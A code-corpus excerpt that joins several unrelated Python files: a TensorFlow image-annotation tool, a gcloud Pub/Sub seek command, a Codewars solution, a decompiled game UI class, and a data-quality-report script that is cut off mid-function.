def get_model_evaluation_categories(self, model_name):
evaluation_categories = []
for c in self.categories:
if self.categories[c]['evaluation_model'] == model_name:
evaluation_categories.append(c)
return evaluation_categories
def load_image_into_numpy_array(self, image):
(im_width, im_height) = image.size
return np.array(image.getdata()).reshape((im_height, im_width, 3)).astype(np.uint8)
def image_dimensions(self, image_np):
image_pil = Image.fromarray(np.uint8(image_np)).convert('RGB')
return image_pil.size
#
# Writing Image XML annotations
#
def swap_exentsion(self, full_filename, new_extension):
template = "%s.%s" # filename, extension
filename_base, old_extension = os.path.splitext(full_filename)
return template % (filename_base, new_extension.strip('.'))
def generate_new_filename(self, output_directory_path, image_info, new_extension):
new_filename = self.swap_exentsion(image_info['image_filename'], new_extension)
full_path = os.path.join(output_directory_path, new_filename)
return full_path
def generate_xml_string(self, image_info):
image_data = {}
image_data['path'] = image_info['image_path']
image_data['folder'] = image_info['image_folder']
image_data['filename'] = image_info['image_filename']
image_data['width'] = image_info['image_width']
image_data['height'] = image_info['image_height']
image_data['depth'] = 3
#unspecifeid
image_data['database'] = 'NA'
image_data['segmented'] = 0
image_data['objects'] = []
for item in image_info['image_items_list']:
o = {}
o['name'] = item['class']
xmin, xmax, ymin, ymax = item['box']
o['xmin'] = xmin
o['ymin'] = ymin
o['xmax'] = xmax
o['ymax'] = ymax
#unspecifeid
o['pose'] = 'Unspecified'
o['truncated'] = 0
o['difficult'] = 0
image_data['objects'].append(o)
# create XML
annotation_tag = ET.Element('annotation')
folder_tag = ET.SubElement(annotation_tag, 'folder')
folder_tag.text = image_data['folder']
filename_tag = ET.SubElement(annotation_tag, 'filename')
filename_tag.text = image_data['filename']
path_tag = ET.SubElement(annotation_tag, 'path')
path_tag.text = image_data['path']
source_tag = ET.SubElement(annotation_tag, 'source')
database_tag = ET.SubElement(source_tag, 'database')
database_tag.text = image_data['database']
size_tag = ET.SubElement(annotation_tag, 'size')
width_tag = ET.SubElement(size_tag, 'width')
width_tag.text = str(image_data['width'])
height_tag = ET.SubElement(size_tag, 'height')
height_tag.text = str(image_data['height'])
depth_tag = ET.SubElement(size_tag, 'depth')
depth_tag.text = str(image_data['depth'])
segmented_tag = ET.SubElement(annotation_tag, 'segmented')
segmented_tag.text = str(0)
for o in image_data['objects']:
object_tag = ET.SubElement(annotation_tag, 'object')
name_tag = ET.SubElement(object_tag, 'name')
name_tag.text = o['name']
pose_tag = ET.SubElement(object_tag, 'pose')
pose_tag.text = o['pose']
truncated_tag = ET.SubElement(object_tag, 'truncated')
truncated_tag.text = str(o['truncated'])
difficult_tag = ET.SubElement(object_tag, 'difficult')
difficult_tag.text = str(o['difficult'])
bndbox_tag = ET.SubElement(object_tag, 'bndbox')
xmin_tag = ET.SubElement(bndbox_tag, 'xmin')
xmin_tag.text = str(o['xmin'])
ymin_tag = ET.SubElement(bndbox_tag, 'ymin')
ymin_tag.text = str(o['ymin'])
xmax_tag = ET.SubElement(bndbox_tag, 'xmax')
xmax_tag.text = str(o['xmax'])
ymax_tag = ET.SubElement(bndbox_tag, 'ymax')
ymax_tag.text = str(o['ymax'])
#return ET.tostring(annotation_tag).decode('utf-8')
dom = minidom.parseString(ET.tostring(annotation_tag).decode('utf-8'))
return dom.toprettyxml(indent='\t')
def write_xml_file(self, image_info, outpath):
        # if directory does not exist, create it
if not os.path.exists(outpath):
os.makedirs(outpath)
xml_string = self.generate_xml_string(image_info)
xml_filename = self.generate_new_filename(outpath, image_info, 'xml')
with open(xml_filename, "w") as f:
f.write(xml_string)
def filter_minimum_score_threshold(self, image_info_bundel, min_score_thresh):
filtered_image_info_bundel = {}
for image_path, image_info in image_info_bundel.items():
filtered_image_info_bundel[image_path] = image_info
filtered_image_items_list = []
for item in image_info['image_items_list']:
if item['score'] > min_score_thresh:
filtered_image_items_list.append(item)
filtered_image_info_bundel[image_path]['image_items_list'] = filtered_image_items_list
return filtered_image_info_bundel
def filter_selected_categories(self, image_info_bundel, selected_categories_list):
filtered_image_info_bundel = {}
for image_path, image_info in image_info_bundel.items():
filtered_image_info_bundel[image_path] = image_info
filtered_image_items_list = []
for item in image_info['image_items_list']:
if item['class'] in selected_categories_list:
filtered_image_items_list.append(item)
filtered_image_info_bundel[image_path]['image_items_list'] = filtered_image_items_list
return filtered_image_info_bundel
def _image_info(self, category_index, selected_categories, image_np, boxes, scores, classes, min_score_thresh=0.0001):
# retrieve image size
image_pil = Image.fromarray(np.uint8(image_np)).convert('RGB')
im_width, im_height = image_pil.size
#box, class, score
item_list = []
for i in range(boxes.shape[0]):
if scores is None or scores[i] > min_score_thresh:
item = {}
#
# box
#
normalized_box = tuple(boxes[i].tolist())
n_ymin, n_xmin, n_ymax, n_xmax = normalized_box
box = (int(n_xmin * im_width), int(n_xmax * im_width), int(n_ymin * im_height), int(n_ymax * im_height)) #(left, right, top, bottom)
item['box'] = box
#
# class name
#
class_name = 'NA'
if classes[i] in category_index.keys():
class_name = str(category_index[classes[i]]['name'])
item['class'] = class_name
#
# detection score
#
item['score'] = 100*scores[i]
# add if class is in selected_classes, to ensure only evaluation model is evalutating
if item['class'] in selected_categories:
item_list.append(item)
return item_list
def get_image_info(self, image_path_list, min_score_thresh=None, prevent_overlap=True):
image_info_bundel = dict((image_path, {'image_items_list':[], 'image_folder':'', 'image_filename':'','image_path':'', 'image_height':-1, 'image_width':-1}) for image_path in image_path_list) #key= path, value is cobined item list
# for each unique model evaluator in categories list perform detection
for model_name in self.get_evaluation_models():
# Load a (frozen) Tensorflow model into memory.
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(self.get_model_path(model_name, 'frozen graph'), 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
# Loading label map
# Label maps map indices to category names, so that when our convolution network predicts `5`, we know that this corresponds to `airplane`. Here we use internal utility functions, but anything that returns a dictionary mapping integers to appropriate string labels would be fine
path_to_labels = self.get_model_path(model_name, 'labels')
label_map = label_map_util.load_labelmap(path_to_labels)
categories_dict = self.get_model_categories_dict(model_name)
num_classes = len(categories_dict)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=num_classes, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
#
# Detection
#
with detection_graph.as_default():
with tf.Session(graph=detection_graph) as sess:
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0') # Definite input and output Tensors for detection_graph
detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0') # Each box represents a part of the image where a particular object was detected.
detection_scores = detection_graph.get_tensor_by_name('detection_scores:0') # Each score represent how level of confidence for each of the objects.
detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')
num_detections = detection_graph.get_tensor_by_name('num_detections:0')
#
# Image Detection Loop
#
for image_path in image_path_list:
#
# prepare image for model input
#
#tmp non relitive path test
script_dir = os.path.dirname(os.path.abspath(__file__))
image = Image.open(os.path.join(script_dir, image_path))
#image = Image.open(image_path)
image_np = self.load_image_into_numpy_array(image)
image_np_expanded = np.expand_dims(image_np, axis=0) # Expand dimensions since the model expects images to have shape: [1, None, None, 3]
#
# Detection
#
(boxes, scores, classes, num) = sess.run([detection_boxes, detection_scores, detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
"""
# new code
if prevent_overlap:
iou_threshold = 0.5 #overlap threshold
max_output_size = 2 #max num boxes overlap threshold
selected_indices = tf.image.non_max_suppression( boxes, scores, max_output_size, iou_threshold)
boxes = tf.gather(boxes, selected_indices) #returns selected boxes
scores = tf.gather(np.squeeze(scores), selected_indices) #returns selected
classes = tf.gather(np.squeeze(classes), selected_indices) #returns selected
"""
#
# Reformat results
#
boxes = np.squeeze(boxes)
scores = np.squeeze(scores)
classes = np.squeeze(classes).astype(np.int32)
#
# Get selected items (box, class, score)
#
#selected classes are all categories current model is set to evaluate
selected_categories = self.get_model_evaluation_categories(model_name)
image_items_list = []
if min_score_thresh is not None:
mst_decimal = min_score_thresh * 0.01 #convert to decimal
image_items_list = self._image_info(category_index, selected_categories, image_np, boxes, scores, classes, mst_decimal)
else:
image_items_list = self._image_info(category_index, selected_categories, image_np, boxes, scores, classes)
# add to / combine image items list
image_info_bundel[image_path]['image_items_list'] += image_items_list
#
# meta data - PLEASE STORE FOR USE IN XML ANNOTATIONS
#
image_path, image_folder, image_filename = self.get_path_data(image_path)
image_height, image_width = self.image_dimensions(image_np)
image_info_bundel[image_path]['image_path'] = image_path
image_info_bundel[image_path]['image_folder'] = image_folder
image_info_bundel[image_path]['image_filename'] = image_filename
image_info_bundel[image_path]['image_height'] = image_height
image_info_bundel[image_path]['image_width'] = image_width
return image_info_bundel
def remove_string_start_end_whitespace(self, string):
if string[0] == ' ':
string = string[1:]
if string[-1] == ' ':
string = string[:-1]
return string
def category_2_symbol(self, category_name):
return category_name.strip()
def _any(self, category_name, min_score, image_items_list):
""" return True if one or more of the category name was detected above minimum score """
for item in image_items_list:
if (item['class'] == category_name) and (item['score'] > min_score): return True
return False
def _num(self, category_name, min_score, image_items_list):
""" return number of the category name detected above minimum score """
num_detected = 0
for item in image_items_list:
if (item['class'] == category_name) and (item['score'] > min_score): num_detected += 1
return num_detected
def boolean_image_evaluation(self, image_path_list, boolean_categories_present):
""" accepts list of paths to images and common boolean expression of categories present ex: any('person',30.0) or (num('basketball', 60.0) > 2)"""
image_info_bundel = self.get_image_info(image_path_list)
image_boolean_bundel = dict((image_path, False) for image_path in image_path_list) #key= path, value is set to false initally
for image_path, image_info in image_info_bundel.items():
any = lambda category_name, min_score : self._any(category_name, min_score, image_info['image_items_list'])
num = lambda category_name, min_score : self._num(category_name, min_score, image_info['image_items_list'])
scope = locals()
image_boolean_bundel[image_path] = eval(boolean_categories_present, scope)
return image_boolean_bundel, image_info_bundel
    def move_images_bool_rule(self, input_image_directory_path, image_output_directory_path, bool_rule, annotations_output_directory_path = False, annotations_min_score_thresh=None, annotations_selected_category_list=None):
        """ given input directory of images (currently JPEG), move selected images that satisfy bool rule to new directory, create annotation directory (xml) if specified. """
# get all image paths in directory
accpeted_extensions = ['jpg', 'JPEG', 'jpeg']
image_path_list = []
for extension in accpeted_extensions:
glob_phrase = os.path.join(input_image_directory_path, '*.' + extension)
for image_path in glob.glob(glob_phrase):
                #check image can be reshaped (tmp)
try:
script_dir = os.path.dirname(os.path.abspath(__file__))
image = Image.open(os.path.join(script_dir, image_path))
image_np = self.load_image_into_numpy_array(image)
                    image_np_expanded = np.expand_dims(image_np, axis=0) # Expand dimensions since the model expects images to have shape: [1, None, None, 3]
#add
image_path_list += [image_path]
#tmp
print(image_path)
except:
print("error loading: %s" % image_path)
# evaluate
image_boolean_bundel, image_info_bundel = self.boolean_image_evaluation(image_path_list, bool_rule)
# if image output directory does not exist, create it
if not os.path.exists(image_output_directory_path): os.makedirs(image_output_directory_path)
# copy images over with same basename
for image_path, copy_bool in image_boolean_bundel.items():
if copy_bool: shutil.copy(image_path, image_output_directory_path)
#annotations
# if image output directory does not exist, create it
if annotations_output_directory_path is not False:
if not os.path.exists(annotations_output_directory_path): os.makedirs(annotations_output_directory_path)
#filter selected categories and min score threshold for image_info_bundel
if annotations_selected_category_list is not None:
image_info_bundel = self.filter_selected_categories(image_info_bundel, annotations_selected_category_list)
if annotations_min_score_thresh is not None:
image_info_bundel = self.filter_minimum_score_threshold(image_info_bundel, annotations_min_score_thresh)
#change image location data and write xml file
for image_path, image_info in image_info_bundel.items():
#if bool statment is true
if image_boolean_bundel[image_path]:
#change image location info
new_image_info = image_info
new_image_filename = os.path.basename(image_path) #same technically
new_image_folder = os.path.basename(image_output_directory_path)
new_image_path = os.path.join(image_output_directory_path, new_image_filename)
new_image_info['image_path'] = new_image_path
new_image_info['image_folder'] = new_image_folder
new_image_info['image_filename'] = new_image_filename
#write
self.write_xml_file(new_image_info, annotations_output_directory_path)
def run():
pass
"""
BASKETBALL_MODEL = {'name' : 'basketball_model_v1', 'use_display_name' : False, 'paths' : {'frozen graph': "models/basketball_model_v1/frozen_inference_graph/frozen_inference_graph.pb", 'labels' : "models/basketball_model_v1/label_map.pbtxt"}}
PERSON_MODEL = {'name' : 'ssd_mobilenet_v1_coco_2017_11_17', 'use_display_name' : True, 'paths' : {'frozen graph': "models/ssd_mobilenet_v1_coco_2017_11_17/frozen_inference_graph/frozen_inference_graph.pb", 'labels' : "models/ssd_mobilenet_v1_coco_2017_11_17/mscoco_label_map.pbtxt"}}
ie = Image_Evaluator()
ie.load_models([BASKETBALL_MODEL, PERSON_MODEL])
image_input_base_directory_path = "/Users/ljbrown/Desktop/StatGeek/image_collecting/google-images-download/downloads/"
# for each directory in downloads
for image_dir_path in glob.glob(image_input_base_directory_path + "/*/"):
dirname = os.path.basename(image_dir_path[:-1])
print(dirname)
image_input_directory_path = "/Users/ljbrown/Desktop/StatGeek/image_collecting/google-images-download/downloads/" + dirname
image_output_directory_path = "/Users/ljbrown/Desktop/StatGeek/image_collecting/gather/%s_images" % dirname
annotation_output_directory_path = "/Users/ljbrown/Desktop/StatGeek/image_collecting/gather/%s_annotations" % dirname
bool_rule = "(any('basketball', 85.0) and not any('person', 15.0)) or ((num('person', 95.0) == 1) and not any('basketball', 15.0) and (num('person', 15.0) == 1)) or (any('basketball', 85.0) and (num('person', 95.0) ==1) and (num('person', 15.0) == 1))"
#print(image_input_directory_path)
#print(image_output_directory_path)
#print(annotation_output_directory_path)
ie.move_images_bool_rule(image_input_directory_path, image_output_directory_path, bool_rule, annotation_output_directory_path, 85.0, ['basketball', 'person'])
"""
| [
"[email protected]"
] | |
8d3a150e92b97edc73a1af8bcfa9566c2296219c | 23611933f0faba84fc82a1bc0a85d97cf45aba99 | /google-cloud-sdk/.install/.backup/lib/surface/pubsub/subscriptions/seek.py | 718094747211caab81d5b553f97be853d2cb982b | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | KaranToor/MA450 | 1f112d1caccebdc04702a77d5a6cee867c15f75c | c98b58aeb0994e011df960163541e9379ae7ea06 | refs/heads/master | 2021-06-21T06:17:42.585908 | 2020-12-24T00:36:28 | 2020-12-24T00:36:28 | 79,285,433 | 1 | 1 | Apache-2.0 | 2020-12-24T00:38:09 | 2017-01-18T00:05:44 | Python | UTF-8 | Python | false | false | 3,886 | py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cloud Pub/Sub subscriptions seek command."""
from googlecloudsdk.calliope import arg_parsers
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.projects import util as projects_util
from googlecloudsdk.command_lib.pubsub import util
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class SeekAlpha(base.Command):
"""This feature is part of an invite-only release of the Cloud Pub/Sub API.
Resets a subscription's backlog to a point in time or to a given snapshot.
This feature is part of an invitation-only release of the underlying
Cloud Pub/Sub API. The command will generate errors unless you have access to
this API. This restriction should be relaxed in the near future. Please
contact [email protected] with any questions in the meantime.
"""
@staticmethod
def Args(parser):
"""Registers flags for this command."""
parser.add_argument('subscription',
help='Name of the subscription to affect.')
seek_to_parser = parser.add_mutually_exclusive_group(required=True)
seek_to_parser.add_argument(
'--time', type=arg_parsers.Datetime.Parse,
help=('The time to seek to. Messages in the subscription that '
'were published before this time are marked as acknowledged, and '
'messages retained in the subscription that were published after '
'this time are marked as unacknowledged. See `gcloud topic '
'datetimes` for information on time formats.'))
seek_to_parser.add_argument(
'--snapshot',
help=('The name of the snapshot. The snapshot\'s topic must be the same'
' as that of the subscription.'))
parser.add_argument(
'--snapshot-project', default='',
help=('The name of the project the snapshot belongs to (if seeking to '
'a snapshot). If not set, it defaults to the currently selected '
'cloud project.'))
def Collection(self):
return util.SUBSCRIPTIONS_SEEK_COLLECTION
def Run(self, args):
"""This is what gets called when the user runs this command.
Args:
args: an argparse namespace. All the arguments that were provided to this
command invocation.
Returns:
A serialized object (dict) describing the results of the operation. This
description fits the Resource described in the ResourceRegistry under
'pubsub.subscriptions.seek'.
"""
msgs = self.context['pubsub_msgs']
pubsub = self.context['pubsub']
subscription_path = util.SubscriptionFormat(args.subscription)
result = {'subscriptionId': subscription_path}
seek_req = msgs.SeekRequest()
if args.snapshot:
if args.snapshot_project:
snapshot_project = (
projects_util.ParseProject(args.snapshot_project).Name())
else:
snapshot_project = ''
seek_req.snapshot = util.SnapshotFormat(args.snapshot, snapshot_project)
result['snapshotId'] = seek_req.snapshot
else:
seek_req.time = args.time.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
result['time'] = seek_req.time
pubsub.projects_subscriptions.Seek(
msgs.PubsubProjectsSubscriptionsSeekRequest(
seekRequest=seek_req, subscription=subscription_path))
return result
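# Illustrative invocations of this command (subscription, snapshot and project names are placeholders):
#   gcloud alpha pubsub subscriptions seek my-sub --time=2017-01-01T00:00:00Z
#   gcloud alpha pubsub subscriptions seek my-sub --snapshot=my-snapshot --snapshot-project=my-project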
| [
"[email protected]"
] | |
d5819b2f4f33d1ec6a077546f64c2b6e4b92968b | 8620d98b00cf0a9f60415408bf82184efd20431a | /Codewars/Remove the parentheses.py | 4942b2db2d2619ef5572685d2c498a9e0f1200bf | [] | no_license | SA-Inc/Contest-Tasks | 628aa4028bb5e3e5efc519c1369f5c95f4b46eff | dfffaec7d93fe217f19d532a3c5c799103f2a06d | refs/heads/main | 2023-02-26T21:56:54.067172 | 2021-02-09T07:23:26 | 2021-02-09T07:23:26 | 323,820,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,031 | py | # https://www.codewars.com/kata/5f7c38eb54307c002a2b8cc8
def remove_parentheses(s):
# res = ''
# startIdx = None
# endIdx = None
# for i in range(len(s)):
# if s[i] == '(':
# startIdx = i
# break
# for i in reversed(range(len(s))):
# if s[i] == ')':
# endIdx = i
# break
# for i in range(len(s)):
# if i >= startIdx and i <= endIdx:
# continue
# else:
# res += s[i]
# return res
# isSkip = False
# for i in range(len(s)):
# if s[i] == '(':
# isSkip = True
# if s[i] == ')':
# isSkip = False
# continue
# if isSkip == False:
# res += s[i]
# return res
    # final approach: track parenthesis nesting depth and keep characters only at depth 0
    parenthesesCount = 0
res = ''
for i in s:
if i == '(':
parenthesesCount += 1
elif i == ')':
parenthesesCount -= 1
else:
if parenthesesCount == 0:
res += i
return res
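# Illustrative checks of the final approach (inputs chosen for demonstration, not taken from the kata's test suite):
#   remove_parentheses("example(unwanted thing)example")  ->  "exampleexample"
#   remove_parentheses("a(b(c)d)e")                       ->  "ae"   (nested groups are removed as a whole)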
| [
"[email protected]"
] | |
cfa8945289850ff63e497fcc908de2732efb4faf | bb33e6be8316f35decbb2b81badf2b6dcf7df515 | /source/res/scripts/client/gui/Scaleform/daapi/view/battle/event/hunter_respawn.py | d81a741d398ce19a72f4ca18421e45b81afc015c | [] | no_license | StranikS-Scan/WorldOfTanks-Decompiled | 999c9567de38c32c760ab72c21c00ea7bc20990c | d2fe9c195825ececc728e87a02983908b7ea9199 | refs/heads/1.18 | 2023-08-25T17:39:27.718097 | 2022-09-22T06:49:44 | 2022-09-22T06:49:44 | 148,696,315 | 103 | 39 | null | 2022-09-14T17:50:03 | 2018-09-13T20:49:11 | Python | UTF-8 | Python | false | false | 1,419 | py | # Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/battle/event/hunter_respawn.py
import BigWorld
from gui.Scaleform.daapi.view.battle.event.boss_teleport import EventBossTeleportView
from gui.Scaleform.daapi.view.meta.EventHunterRespawnViewMeta import EventHunterRespawnViewMeta
from gui.wt_event.wt_event_helpers import getSpeed
from gui.impl import backport
from gui.impl.gen import R
from gui.shared.gui_items.Vehicle import getIconResourceName
class EventHunterRespawnView(EventBossTeleportView, EventHunterRespawnViewMeta):
def onRespawnPointClick(self, pointGuid):
self._chooseSpawnPoint(pointGuid)
def showSpawnPoints(self):
self._blur.enable()
timeLeft = 0
timeTotal = 0
respawnComponent = BigWorld.player().dynamicComponents.get('respawnComponent')
if respawnComponent:
timeLeft = respawnComponent.endTime - BigWorld.serverTime()
timeTotal = respawnComponent.duration
self.as_updateTimerS(timeLeft, timeTotal, replaySpeed=getSpeed())
vTypeVO = self._sessionProvider.getCtx().getVehicleInfo(BigWorld.player().playerVehicleID).vehicleType
iconName = getIconResourceName(vTypeVO.iconName)
icon = R.images.gui.maps.icons.wtevent.hunterRespawn.dyn(iconName)
if icon.exists():
self.as_setIconS(backport.image(icon()))
| [
"[email protected]"
] | |
086d727ec9d02496b8aed3098471ba7117856217 | 8b7a9ba0c2f8259ee7cfdfa83d8b702cb494c95b | /MyQuickDQR.py | a5e9a3a657d8985a49cee91a27141c9f92aff41f | [] | no_license | danyiwang/Fraud-Analytics-Coursework | cd216b7e6c57470b513bbb29eb92248d851a17b7 | 04396a7b7c13476a3493a4f3aeed36273cdf1d78 | refs/heads/master | 2020-04-25T11:56:23.792373 | 2019-04-11T09:31:55 | 2019-04-11T09:31:55 | 172,761,849 | 0 | 0 | null | 2019-02-26T18:14:05 | 2019-02-26T17:55:47 | Python | UTF-8 | Python | false | false | 13,117 | py | ## Note: the format and style can be customized.
## Process
## Step 1: read data
## import pandas as pd
## import MyQuickDQR as dqr
## mydata = pd.read_csv()
## Step 2: define category columns
## mydata[category_columns] = mydata[category_columns].astype('category')
## keep in mind that some columns may need to change from numeric to category: ZIP, etc.
## Step 3: generate Data Quality Report
## dqr.QuickDQR(mydata, 'xxx.docx')
## Step 4: If the output reads "Fail to add graph for (variable name)", you need to manually make a plot. Sorry for the inconvenience.
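## Example usage (the file name and column list below are placeholders for illustration):
## import pandas as pd
## import MyQuickDQR as dqr
## mydata = pd.read_csv('card_transactions.csv')
## category_columns = ['ZIP', 'State', 'Merchnum'] # fields to treat as categorical
## mydata[category_columns] = mydata[category_columns].astype('category')
## dqr.QuickDQR(mydata, 'card_transactions_DQR.docx')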
import pandas as pd
import numpy as np
import scipy.stats as sps
import matplotlib.pyplot as plt
import seaborn as sns
import sklearn as skl
from docx import Document
from docx.shared import Inches
# Function to map out the summary table for Categorical Variable.
def MapCategory(cat):
# Initiate Empty Summary Table for Categorical Variable
cat_col = list(cat.columns)
t ={'colname': cat_col,
'n_record': cat_col,
'percent' : cat_col,
'unique_v': cat_col,
'mode': cat_col,
'count_mode': cat_col}
cat_table = pd.DataFrame(t)
for l in range(len(cat_table)):
cat_table.iloc[l,1] = cat.iloc[:,l].count()
cat_table.iloc[l,2] = round(cat_table.iloc[l,1] / len(cat) * 100,2)
cat_table.iloc[l,3] = len(cat.iloc[:,l].unique())
m = cat.iloc[:,l].value_counts()
cat_table.iloc[l,4] = m.index[0]
cat_table.iloc[l,5] = m.iloc[0]
return cat_table
def DesCategory(cat_table):
# Description for Categorical Variable
cat_description = []
for i in range(len(cat_table)):
name = str(cat_table['colname'][i])
n = str(int(cat_table['n_record'][i]))
p = str(round(cat_table['percent'][i],2))
unique_v = str(cat_table['unique_v'][i])
mode = str(cat_table['mode'][i])
count = str(cat_table['count_mode'][i])
cat_description.append(name+' is a categorical variable. '+name+\
' has '+n+' lines of records, and is '+p+\
'% populated. '+name+' has '+unique_v +\
' unique categories. The most common category is '\
+mode+ ', which occured '+count+' times out of '\
+n+' records. ')
return cat_description
def GraphCategory(cat):
sns.set_style("whitegrid")
# Create Category Graph
    cat_col = list(cat.columns)
    comment = []  # collect columns with many (>= 20) categories; used for the descriptions below
    for c in cat_col:
        m = cat[c].value_counts()
        name = c + '.png'
        level = len(m)
try:
if level >= 20:
comment.append(c)
                    if m.iloc[0] / m.iloc[2] >= 8:  # counts differ greatly in scale, so use a log y-axis
plot = cat[c].value_counts().head(20).plot(kind='bar')
plot.set_yscale('log')
plt.savefig(name,bbox_inches = 'tight')
plt.clf()
else:
plot = cat[c].value_counts().head(20).plot(kind='bar')
plt.savefig(name,bbox_inches = 'tight')
plt.clf()
else:
                    if m.iloc[0] / m.iloc[2] >= 8:  # counts differ greatly in scale, so use a log y-axis
plot = cat[c].value_counts().plot(kind='bar')
plot.set_yscale('log')
plt.savefig(name,bbox_inches = 'tight')
plt.clf()
else:
plot = cat[c].value_counts().plot(kind='bar')
plt.savefig(name,bbox_inches = 'tight')
plt.clf()
except:
print('Fail to create graph for', c, '. Try manually.')
# Description for Categorical Variable: comment on graphs
cat_description = []
for c in cat_col:
if c in comment:
            cat_description.append('Below is a graph showing the distribution of '+c+': ')
        else:
            cat_description.append('Below is a graph showing the distribution of '+c+': (Showing top 20 categories)')
return cat_description
# Initiate Summary Table for Numerical Variable
def MapNumeric(num):
num_col = list(num.columns)
t ={'colname': num_col,
'n_record': num_col,
'percent' : num_col,
'unique_v': num_col,
'n_zero': num_col,
'mode': num_col,
'count_mode': num_col,
'min': num_col,
'max': num_col,
'mean': num_col,
'std': num_col,
}
num_table = pd.DataFrame(t)
# Fill in the Numerical Variable Summary Table
for l in range(len(num_table)):
num_table.iloc[l,1] = num.iloc[:,l].count()
num_table.iloc[l,2] = round(num_table.iloc[l,1] / len(num) * 100,2)
num_table.iloc[l,3] = len(num.iloc[:,l].unique())
num_table.iloc[l,4] = sum(num.iloc[:,l] == 0)
m = num.iloc[:,l].value_counts()
num_table.iloc[l,5] = m.index[0]
num_table.iloc[l,6] = m.iloc[0]
num_table.iloc[l,7] = num.iloc[:,l].min()
num_table.iloc[l,8] = round(num.iloc[:,l].max(), 2)
num_table.iloc[l,9] = round(num.iloc[:,l].mean(), 2)
num_table.iloc[l,10] = round(num.iloc[:,l].std(), 2)
return num_table
def DesNumeric(num_table):
# Description for Numerical Variable
num_description1 = []
for i in range(len(num_table)):
name = str(num_table['colname'][i])
n = str(int(num_table['n_record'][i]))
p = str(round(num_table['percent'][i],2))
unique_v = str(num_table['unique_v'][i])
n_zero = str(num_table['n_zero'][i])
mode = str(num_table['mode'][i])
count = str(num_table['count_mode'][i])
min_ = str(int(num_table['min'][i]))
max_ = str(int(num_table['max'][i]))
avg = str(round(num_table['mean'][i],2))
std = str(round(num_table['std'][i],2))
num_description1.append(name+' is a numeric variable. '+name+' has '\
+n+' lines of records, and is '+p+'% populated. '\
+name+' has '+unique_v +' unique categories. '\
+'The most common value is '+mode+ ', occured '\
+count+' times. '+name+' has '+n_zero+\
' zero values out of '+n+' lines of records. '\
                                 +'The summary statistics and distribution are as follows: '\
+'(excluding null value)')
return num_description1
def GraphNumeric(num):
# Create Graph for Numerical Variable
num_col = list(num.columns)
for c in num_col:
null_remove = num[pd.isnull(num[c]) == False]
m = null_remove[c].value_counts()
mode_count = m.iloc[0]
next_mode_count = m.iloc[4]
name = c+'.png'
try:
if (mode_count / next_mode_count) >= 5:
sns.distplot(null_remove[c],bins = 80, kde=False, rug = False).set_yscale('log')
plt.savefig(name,bbox_inches = 'tight')
plt.clf()
else:
sns.distplot(null_remove[c],bins = 80, kde=False, rug = False)
plt.savefig(name,bbox_inches = 'tight')
plt.clf()
except:
print('Fail to create graph for',c,'. Try manually.')
def QuickDQR(mydata, filename):
    # Divide fields into categorical and numerical variables
cat = mydata.loc[:, mydata.dtypes == 'category']
num = mydata.loc[:, mydata.dtypes != 'category']
#Produce Cat Results
cat_table = MapCategory(cat)
cat_description1 = DesCategory(cat_table)
cat_description2 = GraphCategory(cat)
#Produce Num Results
num_table = MapNumeric(num)
num_description1 = DesNumeric(num_table)
GraphNumeric(num)
# Document Output!!!
document = Document()
document.add_heading('Data Quality Report', 0)
# High-level summary
document.add_heading('High-Level Description of the Data',level = 1)
document.add_paragraph('This dataset shows the information about (dataset name). '\
+'It covers the period from (1/1/2010) to (12/31/2010). '\
+'The dataset has '+str(mydata.shape[1])+\
' fields and '+str(mydata.shape[0])+' records.', style = 'Body Text')
# Summary table of all fields
document.add_heading('Summary Table of All Fields',level = 1)
document.add_paragraph('After understanding each field, I re-categorized '\
+'those fields into numerical and categorical fields. '\
+str(len(num_table))+' field is recognized as numerical field '\
+'and the rest of the '+str(len(cat_table))+' fields are categorical fields. '\
+'The following are two summary tables for categorical fields '\
+'and numerical fields followed by each individual field’s '\
+'detailed description respectively.',style = 'Body Text')
# Categorical Variable:
document.add_heading('Categorical Variable Summary: ', level = 2)
# Initiate Summary Table Header
table = document.add_table(rows = 1, cols = 6, style = 'Light Grid Accent 1')
hdr_cells = table.rows[0].cells
hdr_cells[0].text = 'Field'
hdr_cells[1].text = 'Number of Records'
hdr_cells[2].text = 'Populated %'
hdr_cells[3].text = 'Unique Value'
hdr_cells[4].text = 'Most Common Category'
    hdr_cells[5].text = 'Occurrence of Common Category'
# Fill in Summary Table Cell
cat_col = list(cat.columns)
for i in range(len(cat_col)):
row_cells = table.add_row().cells
for j in range(6):
row_cells[j].text = str(cat_table.iloc[i,j])
# Individual Field:
document.add_heading('Individual Fields: ', level = 3)
for i in range(len(cat_description1)):
name = cat_col[i]
document.add_paragraph(name, style = 'List Number')
document.add_paragraph(cat_description1[i], style = 'Body Text')
table = document.add_table(rows = 1, cols = 6, style = 'Light Grid Accent 1')
hdr_cells = table.rows[0].cells
hdr_cells[0].text = 'Field'
hdr_cells[1].text = 'Number of Records'
hdr_cells[2].text = 'Populated %'
hdr_cells[3].text = 'Unique Value'
hdr_cells[4].text = 'Most Common Category'
        hdr_cells[5].text = 'Occurrence of Common Category'
row_cells = table.add_row().cells
for j in range(6):
row_cells[j].text = str(cat_table.iloc[i,j])
document.add_paragraph(cat_description2[i], style = 'Body Text')
try:
document.add_picture(name+'.png')
except:
